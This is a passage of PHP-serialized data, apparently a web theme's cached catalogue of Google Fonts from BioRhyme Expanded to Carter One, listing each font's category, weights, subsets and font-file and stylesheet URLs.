me+Expanded:700";i:800;s:61:"https://fonts.googleapis.com/css?family=BioRhyme+Expanded:800";}}s:7:"biryani";a:7:{s:4:"name";s:7:"Biryani";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"600";i:4;s:3:"700";i:5;s:3:"800";i:6;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:7:{i:200;s:85:"http://fonts.gstatic.com/s/biryani/v1/Xx38YzyTFF8n6mRS1Yd88vesZW2xOQ-xsNqO47m55DA.ttf";i:300;s:85:"http://fonts.gstatic.com/s/biryani/v1/u-bneRbizmFMd0VQp5Ze6vesZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/biryani/v1/W7bfR8-IY76Xz0QoB8L2xw.ttf";i:600;s:85:"http://fonts.gstatic.com/s/biryani/v1/1EdcPCVxBR2txgjrza6_YPesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/biryani/v1/qN2MTZ0j1sKSCtfXLB2dR_esZW2xOQ-xsNqO47m55DA.ttf";i:800;s:85:"http://fonts.gstatic.com/s/biryani/v1/DJyziS7FEy441v22InYdevesZW2xOQ-xsNqO47m55DA.ttf";i:900;s:85:"http://fonts.gstatic.com/s/biryani/v1/trcLkrIut0lM_PPSyQfAMPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:7:{i:200;s:51:"https://fonts.googleapis.com/css?family=Biryani:200";i:300;s:51:"https://fonts.googleapis.com/css?family=Biryani:300";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Biryani:regular";i:600;s:51:"https://fonts.googleapis.com/css?family=Biryani:600";i:700;s:51:"https://fonts.googleapis.com/css?family=Biryani:700";i:800;s:51:"https://fonts.googleapis.com/css?family=Biryani:800";i:900;s:51:"https://fonts.googleapis.com/css?family=Biryani:900";}}s:6:"bitter";a:7:{s:4:"name";s:6:"Bitter";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/bitter/v10/w_BNdJvVZDRmqy5aSfB2kQ.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/bitter/v10/TC0FZEVzXQIGgzmRfKPZbA.ttf";i:700;s:64:"http://fonts.gstatic.com/s/bitter/v10/4dUtr_4BvHuoRU35suyOAg.ttf";}s:4:"urls";a:3:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Bitter:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Bitter:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Bitter:700";}}s:13:"black_ops_one";a:7:{s:4:"name";s:13:"Black Ops One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/blackopsone/v7/2XW-DmDsGbDLE372KrMW1Yjjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Black+Ops+One:regular";}}s:5:"bokor";a:7:{s:4:"name";s:5:"Bokor";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"khmer";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/bokor/v8/uAKdo0A85WW23Gs6mcbw7A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Bokor:regular";}}s:6:"bonbon";a:7:{s:4:"name";s:6:"Bonbon";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/bonbon/v7/IW3u1yzG1knyW5oz0s9_6Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Bonbon:regular";}}s:8:"boogaloo";a:7:{s:4:"name";s:8:"Boogaloo";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/boogaloo/v6/4Wu1tvFMoB80fSu8qLgQfQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Boogaloo:regular";}}s:10:"bowlby_one";a:7:{s:4:"name";s:10:"Bowlby One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/bowlbyone/v7/eKpHjHfjoxM2bX36YNucefesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Bowlby+One:regular";}}s:13:"bowlby_one_sc";a:7:{s:4:"name";s:13:"Bowlby One SC";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/bowlbyonesc/v8/8ZkeXftTuzKBtmxOYXoRedDkZCMxWJecxjvKm2f8MJw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Bowlby+One+SC:regular";}}s:7:"brawler";a:7:{s:4:"name";s:7:"Brawler";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/brawler/v6/3gfSw6imxQnQxweVITqUrg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Brawler:regular";}}s:10:"bree_serif";a:7:{s:4:"name";s:10:"Bree Serif";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/breeserif/v5/5h9crBVIrvZqgf34FHcnEfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Bree+Serif:regular";}}s:14:"bubblegum_sans";a:7:{s:4:"name";s:14:"Bubblegum Sans";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/bubblegumsans/v5/Y9iTUUNz6lbl6TrvV4iwsytnKWgpfO2iSkLzTz-AABg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Bubblegum+Sans:regular";}}s:11:"bubbler_one";a:7:{s:4:"name";s:11:"Bubbler One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/bubblerone/v4/e8S0qevkZAFaBybtt_SU4qCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Bubbler+One:regular";}}s:4:"buda";a:7:{s:4:"name";s:4:"Buda";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:3:"300";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{i:300;s:61:"http://fonts.gstatic.com/s/buda/v6/hLtAmNUmEMJH2yx7NGUjnA.ttf";}s:4:"urls";a:1:{i:300;s:48:"https://fonts.googleapis.com/css?family=Buda:300";}}s:7:"buenard";a:7:{s:4:"name";s:7:"Buenard";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/buenard/v7/NSpMPGKAUgrLrlstYVvIXQ.ttf";i:700;s:85:"http://fonts.gstatic.com/s/buenard/v7/yUlGE115dGr7O9w9FlP3UvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Buenard:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Buenard:700";}}s:6:"bungee";a:7:{s:4:"name";s:6:"Bungee";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/bungee/v2/0jM4G9s968t1_tpwzM9UDg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Bungee:regular";}}s:15:"bungee_hairline";a:7:{s:4:"name";s:15:"Bungee Hairline";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/bungeehairline/v2/8Li3dr3whdkxuk7pmLaZaSom6rTIagUDR1YFcrrRZjQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Bungee+Hairline:regular";}}s:13:"bungee_inline";a:7:{s:4:"name";s:13:"Bungee Inline";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/bungeeinline/v2/Tb-1914q4rFpjT-F66PLCYjjx0o0jr6fNXxPgYh_a8Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Bungee+Inline:regular";}}s:14:"bungee_outline";a:7:{s:4:"name";s:14:"Bungee Outline";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/bungeeoutline/v2/PcidvzXIcqS2Qwxm_iG6bLAREgn5xbW23GEXXnhMQ5Y.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Bungee+Outline:regular";}}s:12:"bungee_shade";a:7:{s:4:"name";s:12:"Bungee Shade";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:10:"vietnamese";i:2;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/bungeeshade/v2/HSW7pxPYXBWkq7OSnuXoeC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Bungee+Shade:regular";}}s:10:"butcherman";a:7:{s:4:"name";s:10:"Butcherman";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/butcherman/v7/bxiJmD567sPBVpJsT0XR0vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Butcherman:regular";}}s:14:"butterfly_kids";a:7:{s:4:"name";s:14:"Butterfly Kids";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/butterflykids/v4/J4NTF5M25htqeTffYImtlUZaDk62iwTBnbnvwSjZciA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Butterfly+Kids:regular";}}s:5:"cabin";a:7:{s:4:"name";s:5:"Cabin";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"500";i:3;s:9:"500italic";i:4;s:3:"600";i:5;s:9:"600italic";i:6;s:3:"700";i:7;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:8:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/cabin/v9/XeuAFYo2xAPHxZGBbQtHhA.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/cabin/v9/0tJ9k3DI5xC4GBgs1E_Jxw.ttf";i:500;s:62:"http://fonts.gstatic.com/s/cabin/v9/HgsCQ-k3_Z_uQ86aFolNBg.ttf";s:9:"500italic";s:83:"http://fonts.gstatic.com/s/cabin/v9/50sjhrGE0njyO-7mGDhGP_esZW2xOQ-xsNqO47m55DA.ttf";i:600;s:62:"http://fonts.gstatic.com/s/cabin/v9/eUDAvKhBtmTCkeVBsFk34A.ttf";s:9:"600italic";s:83:"http://fonts.gstatic.com/s/cabin/v9/sFQpQDBd3G2om0Nl5dD2CvesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/cabin/v9/4EKhProuY1hq_WCAomq9Dg.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/cabin/v9/K83QKi8MOKLEqj6bgZ7LrfesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:8:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Cabin:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Cabin:italic";i:500;s:49:"https://fonts.googleapis.com/css?family=Cabin:500";s:9:"500italic";s:55:"https://fonts.googleapis.com/css?family=Cabin:500italic";i:600;s:49:"https://fonts.googleapis.com/css?family=Cabin:600";s:9:"600italic";s:55:"https://fonts.googleapis.com/css?family=Cabin:600italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Cabin:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Cabin:700italic";}}s:15:"cabin_condensed";a:7:{s:4:"name";s:15:"Cabin Condensed";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/cabincondensed/v8/B0txb0blf2N29WdYPJjMSiQPsWWoiv__AzYJ9Zzn9II.ttf";i:500;s:92:"http://fonts.gstatic.com/s/cabincondensed/v8/Ez4zJbsGr2BgXcNUWBVgEARL_-ABKXdjsJSPT0lc2Bk.ttf";i:600;s:92:"http://fonts.gstatic.com/s/cabincondensed/v8/Ez4zJbsGr2BgXcNUWBVgELS5sSASxc8z4EQTQj7DCAI.ttf";i:700;s:92:"http://fonts.gstatic.com/s/cabincondensed/v8/Ez4zJbsGr2BgXcNUWBVgEMAWgzcA047xWLixhLCofl8.ttf";}s:4:"urls";a:4:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Cabin+Condensed:regular";i:500;s:59:"https://fonts.googleapis.com/css?family=Cabin+Condensed:500";i:600;s:59:"https://fonts.googleapis.com/css?family=Cabin+Condensed:600";i:700;s:59:"https://fonts.googleapis.com/css?family=Cabin+Condensed:700";}}s:12:"cabin_sketch";a:7:{s:4:"name";s:12:"Cabin Sketch";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/cabinsketch/v9/d9fijO34zQajqQvl3YHRCS3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:89:"http://fonts.gstatic.com/s/cabinsketch/v9/ki3SSN5HMOO0-IOLOj069ED2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:2:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Cabin+Sketch:regular";i:700;s:56:"https://fonts.googleapis.com/css?family=Cabin+Sketch:700";}}s:15:"caesar_dressing";a:7:{s:4:"name";s:15:"Caesar Dressing";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/caesardressing/v5/2T_WzBgE2Xz3FsyJMq34T9gR43u4FvCuJwIfF5Zxl6Y.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Caesar+Dressing:regular";}}s:10:"cagliostro";a:7:{s:4:"name";s:10:"Cagliostro";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/cagliostro/v5/i85oXbtdSatNEzss99bpj_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Cagliostro:regular";}}s:5:"cairo";a:7:{s:4:"name";s:5:"Cairo";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:3:"200";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"600";i:4;s:3:"700";i:5;s:3:"900";}s:7:"subsets";a:3:{i:0;s:6:"arabic";i:1;s:5:"latin";i:2;s:9:"latin-ext";}s:5:"files";a:6:{i:200;s:62:"http://fonts.gstatic.com/s/cairo/v1/9BU6Hrio9syG9zwo_CNPXg.ttf";i:300;s:62:"http://fonts.gstatic.com/s/cairo/v1/mpy3SIEJVOIfFnVLujcRDg.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/cairo/v1/-tPnHq7mmAjcjJRSjsuZGA.ttf";i:600;s:62:"http://fonts.gstatic.com/s/cairo/v1/Ct_3a0tcTEyNNSnuZKDd7g.ttf";i:700;s:62:"http://fonts.gstatic.com/s/cairo/v1/ONxTSBYfmg-V5CkIwS_5gQ.ttf";i:900;s:62:"http://fonts.gstatic.com/s/cairo/v1/Fm-hIVCp5OI5mO4Ec71jcw.ttf";}s:4:"urls";a:6:{i:200;s:49:"https://fonts.googleapis.com/css?family=Cairo:200";i:300;s:49:"https://fonts.googleapis.com/css?family=Cairo:300";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Cairo:regular";i:600;s:49:"https://fonts.googleapis.com/css?family=Cairo:600";i:700;s:49:"https://fonts.googleapis.com/css?family=Cairo:700";i:900;s:49:"https://fonts.googleapis.com/css?family=Cairo:900";}}s:14:"calligraffitti";a:7:{s:4:"name";s:14:"Calligraffitti";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/calligraffitti/v7/vLVN2Y-z65rVu1R7lWdvyDXz_orj3gX0_NzfmYulrko.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Calligraffitti:regular";}}s:6:"cambay";a:7:{s:4:"name";s:6:"Cambay";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:4:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/cambay/v1/etU9Bab4VuhzS-OKsb1VXg.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/cambay/v1/ZEz9yNqpEOgejaw1rBhugQ.ttf";i:700;s:63:"http://fonts.gstatic.com/s/cambay/v1/jw9niBxa04eEhnSwTWCEgw.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/cambay/v1/j-5v_uUr0NXTumWN0siOiaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:4:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Cambay:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Cambay:italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Cambay:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Cambay:700italic";}}s:5:"cambo";a:7:{s:4:"name";s:5:"Cambo";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/cambo/v5/PnwpRuTdkYCf8qk4ajmNRA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Cambo:regular";}}s:6:"candal";a:7:{s:4:"name";s:6:"Candal";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/candal/v6/x44dDW28zK7GR1gGDBmj9g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Candal:regular";}}s:9:"cantarell";a:7:{s:4:"name";s:9:"Cantarell";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/cantarell/v6/p5ydP_uWQ5lsFzcP_XVMEw.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/cantarell/v6/DTCLtOSqP-7dgM-V_xKUjqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:87:"http://fonts.gstatic.com/s/cantarell/v6/Yir4ZDsCn4g1kWopdg-ehC3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/cantarell/v6/weehrwMeZBXb0QyrWnRwFXe1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Cantarell:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Cantarell:italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Cantarell:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Cantarell:700italic";}}s:11:"cantata_one";a:7:{s:4:"name";s:11:"Cantata One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/cantataone/v6/-a5FDvnBqaBMDaGgZYnEfqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Cantata+One:regular";}}s:11:"cantora_one";a:7:{s:4:"name";s:11:"Cantora One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/cantoraone/v5/oI-DS62RbHI8ZREjp73ehqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Cantora+One:regular";}}s:8:"capriola";a:7:{s:4:"name";s:8:"Capriola";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/capriola/v4/JxXPlkdzWwF9Cwelbvi9jA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Capriola:regular";}}s:5:"cardo";a:7:{s:4:"name";s:5:"Cardo";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/cardo/v8/jbkF2_R0FKUEZTq5dwSknQ.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/cardo/v8/pcv4Np9tUkq0YREYUcEEJQ.ttf";i:700;s:62:"http://fonts.gstatic.com/s/cardo/v8/lQN30weILimrKvp8rZhF1w.ttf";}s:4:"urls";a:3:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Cardo:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Cardo:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Cardo:700";}}s:5:"carme";a:7:{s:4:"name";s:5:"Carme";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/carme/v7/08E0NP1eRBEyFRUadmMfgA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Carme:regular";}}s:14:"carrois_gothic";a:7:{s:4:"name";s:14:"Carrois Gothic";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/carroisgothic/v5/GCgb7bssGpwp7V5ynxmWy2x3d0cwUleGuRTmCYfCUaM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Carrois+Gothic:regular";}}s:17:"carrois_gothic_sc";a:7:{s:4:"name";s:17:"Carrois Gothic SC";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/carroisgothicsc/v5/bVp4nhwFIXU-r3LqUR8DSJTdPW1ioadGi2uRiKgJVCY.ttf";}s:4:"urls";a:1:{s:7:"regular";s:65:"https://fonts.googleapis.com/css?family=Carrois+Gothic+SC:regular";}}s:10:"carter_one";a:7:{s:4:"name";s:10:"Carter 